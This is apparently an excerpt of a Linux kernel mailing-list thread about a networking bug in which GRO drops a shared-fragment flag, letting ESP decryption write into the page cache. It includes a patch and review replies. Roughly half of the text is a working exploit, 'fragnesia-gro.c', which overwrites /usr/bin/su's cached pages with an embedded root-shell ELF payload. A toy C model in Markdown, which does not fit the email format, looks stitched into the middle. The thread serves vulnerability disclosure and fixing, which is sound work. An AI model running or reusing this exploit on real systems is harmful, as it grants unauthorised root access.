		close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]);
		if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
		if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)");
		mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL);
		mount("sysfs", "/sys", "sysfs", 0, NULL);
		sync_write(p_ns[1]); close(p_ns[1]);
		sync_read(p_veth[0]); close(p_veth[0]);
		if_up("lo");
		ethtool_set(VETH1, ETHTOOL_SGRO, 1);
		if_up(VETH1);
		enable_veth_napi(VETH1);
		add_addr(VETH1, ADDR_DST);
		add_sa();
		int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
		if (ufd < 0) gate_fail("socket");
		struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
		inet_pton(AF_INET, ADDR_DST, &ba.sin_addr);
		if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind");
		int et = UDP_ENCAP_ESPINUDP, gro = 1;
		setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et));
		setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro));
		sync_write(p_rdy[1]);
		pause();
		_exit(0);
	}

	close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]);
	sync_read(p_ns[0]); close(p_ns[0]);
	move_to_netns(VETH1, rx);
	sync_write(p_veth[1]); close(p_veth[1]);
	if_up(VETH0); add_addr(VETH0, ADDR_SRC);
	ethtool_set(VETH0, ETHTOOL_STSO, 0);
	ethtool_set(VETH0, ETHTOOL_SGSO, 0);

	/*
	 * Add a netem delay on the sender veth so both datagrams sit in the
	 * qdisc until the timer fires, then get released into veth_xmit()
	 * within the same softirq context. This guarantees both land in one
	 * NAPI poll cycle for GRO to merge them, without needing sysfs
	 * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the
	 * init namespace). tc uses netlink with ns_capable(), so it works
	 * from a user namespace.
	 */
	if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0)
		gate_fail("tc netem");
	usleep(50000);

	sync_read(p_rdy[0]); close(p_rdy[0]);

	int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
	if (sock < 0) die("socket");
	struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
	struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
	inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr);
	inet_pton(AF_INET, ADDR_DST, &da.sin_addr);
	bind(sock, (struct sockaddr *)&sa, sizeof(sa));
	connect(sock, (struct sockaddr *)&da, sizeof(da));

	int target_fd = open(target_file, O_RDONLY | O_CLOEXEC);
	if (target_fd < 0) die("open target");

	uint32_t seq = 1;
	size_t total_changed = 0;
	int delay_ms = 20;
	int sleep_us = 40000;
	struct timespec last_ok;
	clock_gettime(CLOCK_MONOTONIC, &last_ok);

	printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN);

	/* Warmup: send a dummy pair to prime the netem/NAPI path */
	{
		unsigned char w[16 + SPLICE_LEN];
		memset(w, 0, sizeof(w));
		store_be32(w, ESP_SPI);
		store_be32(w + 4, seq++);
		send(sock, w, sizeof(w), 0);
		store_be32(w + 4, seq++);
		send(sock, w, sizeof(w), 0);
		usleep(sleep_us);
	}

	for (int pass = 0; ; pass++) {
		size_t pass_changed = 0, remaining = 0;

		for (int idx = 0; idx < PAYLOAD_LEN; idx++) {
			unsigned char cur = read_byte_at(target_fd, idx);
			if (cur == shell_elf[idx])
				continue;
			remaining++;

			unsigned char need_ks = cur ^ shell_elf[idx];
			uint16_t nonce = stream_nonce[need_ks];
			unsigned char iv[8];
			memset(iv, 0xcc, sizeof(iv));
			store_be32(iv + 4, nonce);

			unsigned char hdr[16];
			char hp[] = "/tmp/fgro-XXXXXX";
			int hfd = mkstemp(hp); unlink(hp);
			store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++);
			memcpy(hdr + 8, iv, 8);
			write(hfd, hdr, 16);

			int pfd[2];
			pipe(pfd);
			loff_t ho = 0;
			splice(hfd, &ho, pfd[1], NULL, 16, 0);
			loff_t so = (loff_t)idx;
			splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0);
			close(hfd);

			unsigned char p1[16 + SPLICE_LEN];
			store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++);
			memcpy(p1 + 8, iv, 8);
			memset(p1 + 16, 0x41, SPLICE_LEN);
			send(sock, p1, sizeof(p1), 0);

			int cork = 1;
			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
			splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0);
			cork = 0;
			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
			close(pfd[0]); close(pfd[1]);

			usleep(sleep_us);

			unsigned char got = read_byte_at(target_fd, idx);
			if (got == shell_elf[idx]) {
				total_changed++;
				pass_changed++;
				clock_gettime(CLOCK_MONOTONIC, &last_ok);
				printf("\r[+] byte %3d/%-3d  0x%02x -> 0x%02x  ok  (%zu changed)",
				       idx, PAYLOAD_LEN, cur, got, total_changed);
			} else {
				printf("\r[-] byte %3d/%-3d  0x%02x -> 0x%02x (want 0x%02x) MISS",
				       idx, PAYLOAD_LEN, cur, got, shell_elf[idx]);
			}
			fflush(stdout);
		}

		if (remaining == 0)
			break;

		size_t still_wrong = 0;
		for (int idx = 0; idx < PAYLOAD_LEN; idx++)
			if (read_byte_at(target_fd, idx) != shell_elf[idx])
				still_wrong++;

		if (still_wrong == 0)
			break;

		struct timespec now;
		clock_gettime(CLOCK_MONOTONIC, &now);
		long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 +
			       (now.tv_nsec - last_ok.tv_nsec) / 1000000;
		if (elapsed > 30000) {
			printf("\n[!] %zu bytes stuck after 30s without progress\n",
			       still_wrong);
			break;
		}

		if (delay_ms < 500) {
			delay_ms = delay_ms < 250 ? delay_ms * 2 : 500;
			sleep_us = delay_ms * 2000;
			char cmd[128];
			snprintf(cmd, sizeof(cmd),
				 "tc qdisc change dev " VETH0 " root netem delay %dms",
				 delay_ms);
			system(cmd);
		}
		printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n",
		       pass + 1, pass_changed, still_wrong, delay_ms);
		fflush(stdout);
	}

	close(target_fd);
	close(sock);
	kill(rx, SIGTERM);
	waitpid(rx, NULL, 0);

	/* Final verification: count how many bytes match shell_elf */
	int final_fd = open(target_file, O_RDONLY | O_CLOEXEC);
	size_t matching = 0;
	if (final_fd >= 0) {
		for (int i = 0; i < PAYLOAD_LEN; i++)
			if (read_byte_at(final_fd, i) == shell_elf[i])
				matching++;
		close(final_fd);
	}

	printf("\n\n");
	if (total_changed > 0) {
		printf("VULNERABLE: %zu/%d payload bytes now match shell_elf "
		       "(%zu written via GRO flag-strip)\n",
		       matching, PAYLOAD_LEN, total_changed);
		_exit(1);
	}

	printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN);
	_exit(0);
}

[-- Attachment #3: 0001-net-gro-propagate-SKBFL_SHARED_FRAG-in-skb_gro_recei.patch --]
[-- Type: text/plain, Size: 3337 bytes --]

From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001
From: Sultan Alsawaf <sultan@kerneltoast.com>
Date: Wed, 13 May 2026 21:47:51 -0700
Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive()

skb_gro_receive() moves frag descriptors from the incoming skb to the
GRO accumulator through two frag-transfer paths (the direct frag-move
loop and the head_frag + memcpy path) without propagating the
SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a
result, the accumulator ends up holding references to externally owned
or page-cache-backed pages while reporting skb_has_shared_frag() as
false.

This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net:
skbuff: propagate shared-frag marker through frag-transfer helpers"),
which fixed the identical omission in __pskb_copy_fclone(),
skb_try_coalesce(), and skb_shift(). skb_gro_receive() was missed in
that fix since it lives in net/core/gro.c rather than net/core/skbuff.c.

The impact is observable through ESP-over-UDP with UDP GRO: splice()
attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via
ip_append_page(). When two such datagrams are GRO-merged via
skb_gro_receive(), the flag is dropped. After udp_rcv_segment()
re-segments the merged GSO skb, the fresh segments carry the
page-cache frags without the shared-frag marker. esp_input() then sees
!skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast
path, decrypting in place over the page-cache pages. Because AES-GCM
CTR decryption runs before the authentication tag is verified, the
page cache is corrupted even though the tag check subsequently fails.

Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the
accumulator in both frag-transfer paths, matching what the skbuff.c
helpers already do. The third path (frag_list merge at the "merge:"
label) chains the entire incoming skb onto the accumulator's frag_list
without moving individual frag descriptors, so each sub-skb retains
its own flags and no propagation is needed there.

Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
Cc: stable@vger.kernel.org
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com>
---
 net/core/gro.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/net/core/gro.c b/net/core/gro.c
index 31d21de5b15a7..4ac41ced13aeb 100644
--- a/net/core/gro.c
+++ b/net/core/gro.c
@@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
 		skb_frag_off_add(frag, offset);
 		skb_frag_size_sub(frag, offset);
 
+		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
+
 		/* all fragments truesize : remove (head size + sk_buff) */
 		new_truesize = SKB_TRUESIZE(skb_end_offset(skb));
 		delta_truesize = skb->truesize - new_truesize;
@@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
 		memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags);
 		/* We dont need to clear skbinfo->nr_frags here */
 
+		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
+
 		new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff));
 		delta_truesize = skb->truesize - new_truesize;
 		skb->truesize = new_truesize;
-- 
2.54.0
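
The propagation rule described in the commit message above can be illustrated with a small userspace model. This is only a sketch under stated assumptions: every toy_* name and both TOY_* constants are hypothetical stand-ins invented for illustration, not kernel API. "Non-linear" is approximated as nr_frags > 0, and the in-place gate mirrors the !skb_cloned() && !skb_has_shared_frag() condition quoted from esp_input(). It is not the kernel implementation.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-ins: TOY_SHARED_FRAG models SKBFL_SHARED_FRAG. */
#define TOY_SHARED_FRAG (1u << 1)
#define TOY_MAX_FRAGS   17

struct toy_frag {
	const void *page;	/* backing page, possibly owned by someone else */
	unsigned int off;
	unsigned int len;
};

struct toy_skb {
	bool cloned;
	unsigned int flags;	/* models skb_shinfo(skb)->flags */
	size_t nr_frags;
	struct toy_frag frags[TOY_MAX_FRAGS];
};

/* Simplified model of skb_has_shared_frag(): paged data plus the marker. */
bool toy_has_shared_frag(const struct toy_skb *skb)
{
	return skb->nr_frags > 0 && (skb->flags & TOY_SHARED_FRAG) != 0;
}

/*
 * Move every frag descriptor from src to dst. With propagate == false the
 * marker is left behind (the behaviour the patch fixes); with
 * propagate == true it follows the descriptors that were actually moved.
 */
bool toy_move_frags(struct toy_skb *dst, struct toy_skb *src, bool propagate)
{
	size_t moved = src->nr_frags;
	size_t i;

	if (dst->nr_frags + moved > TOY_MAX_FRAGS)
		return false;

	for (i = 0; i < moved; i++)
		dst->frags[dst->nr_frags++] = src->frags[i];
	src->nr_frags = 0;

	if (propagate && moved > 0)
		dst->flags |= src->flags & TOY_SHARED_FRAG;

	return true;
}

/* Consumer-side gate: writing in place is only safe for private data. */
bool toy_can_write_in_place(const struct toy_skb *skb)
{
	return !skb->cloned && !toy_has_shared_frag(skb);
}

/* Merge one shared-frag skb into an empty accumulator and query the gate. */
bool toy_gate_after_merge(bool propagate)
{
	static const char shared_page[64];
	struct toy_skb acc = { 0 };
	struct toy_skb in = { 0 };
	bool ok;

	in.flags = TOY_SHARED_FRAG;
	in.frags[0] = (struct toy_frag){ shared_page, 0, 32 };
	in.nr_frags = 1;

	ok = toy_move_frags(&acc, &in, propagate);
	assert(ok);
	(void)ok;

	return toy_can_write_in_place(&acc);
}
```

In this model, toy_gate_after_merge(false) reports that an in-place write is allowed even though the accumulator now references the shared page. toy_gate_after_merge(true) keeps the gate closed, so a consumer would take the copy-on-write path instead.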



* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
  2026-05-14  6:18 ` Sultan Alsawaf
@ 2026-05-14  8:04 ` Paolo Abeni
  2026-05-14  9:38   ` Hyunwoo Kim
  1 sibling, 1 reply; 6+ messages in thread
From: Paolo Abeni @ 2026-05-14  8:04 UTC (permalink / raw)
  To: Hyunwoo Kim, kuba, steffen.klassert
  Cc: netdev, stable, mhal, davem, horms, edumazet, kerneljasonxing,
	herbert, vakzz, kuniyu, jiayuan.chen, ben, dsahern,
	Sabrina Dubroca

On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> skb_shinfo()->flags when moving frags from source to destination.
> __pskb_copy_fclone() defers the rest of the shinfo metadata to
> skb_copy_header() after copying frag descriptors, but that helper
> only carries over gso_{size,segs,type} and never touches
> skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> descriptors directly and leave flags untouched.  As a result, the
> destination skb keeps a reference to the same externally-owned or
> page-cache-backed pages while reporting skb_has_shared_frag() as
> false.
> 
> The mismatch is harmful in any in-place writer that uses
> skb_has_shared_frag() to decide whether shared pages must be detoured
> through skb_cow_data().  ESP input is one such writer (esp4.c,
> esp6.c), and a single nft 'dup to <local>' rule -- or any other
> nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> skb in esp_input() with the marker stripped, letting an unprivileged
> user write into the page cache of a root-owned read-only file via
> authencesn-ESN stray writes.
> 
> Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> were actually moved from the source.  skb_copy() and skb_copy_expand()
> share skb_copy_header() too but linearize all paged data into freshly
> allocated head storage and emerge with nr_frags == 0, so
> skb_has_shared_frag() returns false on its own; they need no change.
> 
> Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")

Regarding the second Fixes tag: I *think* f4c50a4034e6 needs, in addition or
instead, a follow-up similar to the one Jakub mentioned here:

https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/

/P



* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-14  6:18 ` Sultan Alsawaf
@ 2026-05-14  9:23   ` Hyunwoo Kim
  0 siblings, 0 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-14  9:23 UTC (permalink / raw)
  To: Sultan Alsawaf
  Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
	mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
	dsahern, netdev, stable, imv4bel

On Wed, May 13, 2026 at 11:18:10PM -0700, Sultan Alsawaf wrote:
> On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote:
> > Changes in v2:
> > - Also propagate SHARED_FRAG in skb_shift()
> > - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
> 
> Hi Hyunwoo,
> 
> I've been working on mitigating this vulnerability as a member of the kernel
> team at CIQ, a distro vendor. In particular, we wanted to make sure that there
> weren't any lingering places missing SHARED_FRAG propagation.
> 
> To that end, I used Claude to discover that skb_gro_receive() remained unpatched
> (as you pointed out in the v1 thread). And then I generated a PoC exploiting the
> vulnerable skb_gro_receive() path.
> 
> The PoC is a modified version of the original fragnesia PoC. It works 100% of
> the time, just like the original fragnesia PoC.
> 
> I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a
> look at them.
> 
> Thanks,
> Sultan

Nice catch. Thank you.

After testing, I plan to merge your patch with v2 into a single patch (not a
series) and submit it as v3. I would appreciate it if you could then add an
appropriate credit tag of your own.

I would also appreciate it if you could use AI to look for further paths that
fail to propagate the flag. My own analysis has not identified any others.


Best regards,
Hyunwoo Kim


> /*
>  * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC
>  *
>  * Drop-in replacement for the espintcp fragnesia variant, targeting the same
>  * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the
>  * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way
>  * the original fragnesia does.
>  *
>  * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so
>  * each ESP decrypt corrupts exactly ONE target byte with no collateral damage.
>  * A precomputed IV table selects the AES-GCM keystream byte that XORs the
>  * current file content to the desired shell_elf byte.
>  *
>  * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim.
>  *
>  * Build:
>  *   gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro
>  *
>  * Run (as root):
>  *   ./fragnesia-gro
>  *
>  * Exit codes:
>  *   1: vulnerable (page cache mutated through GRO flag-strip path)
>  *   0: fixed (byte unchanged)
>  *   2: local setup or argument error
>  *   4: namespace/veth gate closed
>  */
> 
> #define _GNU_SOURCE
> 
> #include <arpa/inet.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <limits.h>
> #include <net/if.h>
> #include <netinet/in.h>
> #include <sched.h>
> #include <signal.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/ioctl.h>
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <time.h>
> #include <sys/wait.h>
> #include <unistd.h>
> #include <linux/bpf.h>
> #include <linux/if_addr.h>
> #include <linux/if_alg.h>
> #include <linux/netlink.h>
> #include <linux/xfrm.h>
> 
> /* ---- compat defines ---- */
> 
> #ifndef NLA_ALIGNTO
> #define NLA_ALIGNTO 4
> #endif
> #define NLA_ALIGN(len)  (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))
> #ifndef NLA_HDRLEN
> #define NLA_HDRLEN      ((int)NLA_ALIGN(sizeof(struct nlattr)))
> #endif
> #ifndef RTM_NEWLINK
> #define RTM_NEWLINK 16
> #endif
> #ifndef RTM_NEWADDR
> #define RTM_NEWADDR 20
> #endif
> #ifndef NETLINK_ROUTE
> #define NETLINK_ROUTE 0
> #endif
> #ifndef NETLINK_XFRM
> #define NETLINK_XFRM 6
> #endif
> #ifndef IFLA_IFNAME
> #define IFLA_IFNAME 3
> #endif
> #ifndef IFLA_LINKINFO
> #define IFLA_LINKINFO 18
> #endif
> #ifndef IFLA_INFO_KIND
> #define IFLA_INFO_KIND 1
> #endif
> #ifndef IFLA_INFO_DATA
> #define IFLA_INFO_DATA 2
> #endif
> #ifndef VETH_INFO_PEER
> #define VETH_INFO_PEER 1
> #endif
> #ifndef IFLA_NET_NS_PID
> #define IFLA_NET_NS_PID 19
> #endif
> #ifndef IFA_LOCAL
> #define IFA_LOCAL 2
> #endif
> #ifndef IFA_ADDRESS
> #define IFA_ADDRESS 1
> #endif
> #ifndef NLA_F_NESTED
> #define NLA_F_NESTED (1 << 15)
> #endif
> #ifndef ETHTOOL_SGRO
> #define ETHTOOL_SGRO 0x0000002c
> #endif
> #ifndef ETHTOOL_STSO
> #define ETHTOOL_STSO 0x0000001f
> #endif
> #ifndef ETHTOOL_SGSO
> #define ETHTOOL_SGSO 0x00000024
> #endif
> #ifndef SIOCETHTOOL
> #define SIOCETHTOOL 0x8946
> #endif
> #ifndef UDP_ENCAP
> #define UDP_ENCAP 100
> #endif
> #ifndef UDP_ENCAP_ESPINUDP
> #define UDP_ENCAP_ESPINUDP 2
> #endif
> #ifndef UDP_GRO
> #define UDP_GRO 104
> #endif
> #ifndef UDP_CORK
> #define UDP_CORK 1
> #endif
> #ifndef AF_ALG
> #define AF_ALG 38
> #endif
> #ifndef SOL_ALG
> #define SOL_ALG 279
> #endif
> #ifndef ALG_SET_KEY
> #define ALG_SET_KEY 1
> #endif
> #ifndef ALG_SET_OP
> #define ALG_SET_OP 3
> #endif
> #ifndef ALG_OP_ENCRYPT
> #define ALG_OP_ENCRYPT 1
> #endif
> #ifndef IFLA_XDP
> #define IFLA_XDP 43
> #endif
> #ifndef IFLA_XDP_FD
> #define IFLA_XDP_FD 1
> #endif
> #ifndef IFLA_XDP_FLAGS
> #define IFLA_XDP_FLAGS 3
> #endif
> #ifndef XDP_FLAGS_SKB_MODE
> #define XDP_FLAGS_SKB_MODE (1U << 1)
> #endif
> 
> struct rtnl_ifinfomsg {
> 	unsigned char  ifi_family;
> 	unsigned char  __ifi_pad;
> 	unsigned short ifi_type;
> 	int            ifi_index;
> 	unsigned int   ifi_flags;
> 	unsigned int   ifi_change;
> };
> 
> /* ---- constants ---- */
> 
> #define VETH0       "veth0"
> #define VETH1       "veth1"
> #define ADDR_SRC    "10.0.0.1"
> #define ADDR_DST    "10.0.0.2"
> #define UDP_PORT    4500
> #define ESP_SPI     0x100
> #define ICV_LEN     16
> #define PAYLOAD_LEN 192
> /*
>  * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into
>  * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With
>  * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted.
>  */
> #define SPLICE_LEN  (1 + ICV_LEN)
> 
> static const unsigned char xfrm_key[20] = {
> 	0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
> 	0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff,
> 	0x01, 0x02, 0x03, 0x04
> };
> 
> static const uint8_t shell_elf[PAYLOAD_LEN] = {
> 	0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
> 	0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
> 	0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> 	0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
> 	0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
> 	0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
> 	0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
> 	0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> };
> 
> static const char *target_file = "/usr/bin/su";
> 
> /* ---- utility ---- */
> 
> static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); }
> static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); }
> 
> static void store_be32(unsigned char *p, uint32_t v)
> {
> 	p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
> }
> 
> static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); }
> static void sync_read(int fd)  { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); }
> 
> static unsigned char read_byte_at(int fd, off_t off)
> {
> 	unsigned char b;
> 	if (pread(fd, &b, 1, off) != 1) die("pread");
> 	return b;
> }
> 
> /* ---- netlink helpers ---- */
> 
> static int nl_ack_errno(char *buf, ssize_t len)
> {
> 	struct nlmsghdr *nlh;
> 	for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len);
> 	     nlh = NLMSG_NEXT(nlh, len)) {
> 		if (nlh->nlmsg_type == NLMSG_ERROR) {
> 			struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh);
> 			if (e->error == 0) return 0;
> 			errno = -e->error;
> 			return -1;
> 		}
> 	}
> 	errno = EPROTO;
> 	return -1;
> }
> 
> static void add_nlattr(struct nlmsghdr *nlh, size_t max,
> 		       unsigned short type, const void *data, size_t len)
> {
> 	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
> 	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
> 	if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
> 	nla->nla_type = type;
> 	nla->nla_len = NLA_HDRLEN + len;
> 	memcpy((char *)nla + NLA_HDRLEN, data, len);
> 	nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len);
> }
> 
> static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type)
> {
> 	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
> 	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
> 	if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
> 	nla->nla_type = type;
> 	nla->nla_len = NLA_HDRLEN;
> 	nlh->nlmsg_len = off + NLA_HDRLEN;
> 	return nla;
> }
> 
> static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla)
> {
> 	nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla);
> }
> 
> static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label)
> {
> 	struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
> 	char resp[4096];
> 	int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto);
> 	if (fd < 0) gate_fail(label);
> 	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
> 	memset(&sa, 0, sizeof(sa));
> 	sa.nl_family = AF_NETLINK;
> 	if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
> 	ssize_t r = recv(fd, resp, sizeof(resp), 0);
> 	if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label);
> 	close(fd);
> }
> 
> /* ---- network setup ---- */
> 
> static void if_up(const char *name)
> {
> 	struct ifreq ifr = {};
> 	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 	if (fd < 0) gate_fail("socket");
> 	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
> 	if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name);
> 	ifr.ifr_flags |= IFF_UP;
> 	if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name);
> 	close(fd);
> }
> 
> static void create_veth(void)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
> 	nlh->nlmsg_type = RTM_NEWLINK;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
> 	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1);
> 	struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED);
> 	add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5);
> 	struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED);
> 	struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED);
> 	{ size_t o = NLMSG_ALIGN(nlh->nlmsg_len);
> 	  memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg));
> 	  nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); }
> 	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1);
> 	nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li);
> 	nl_talk(nlh, NETLINK_ROUTE, "create veth");
> }
> 
> static void move_to_netns(const char *name, pid_t pid)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
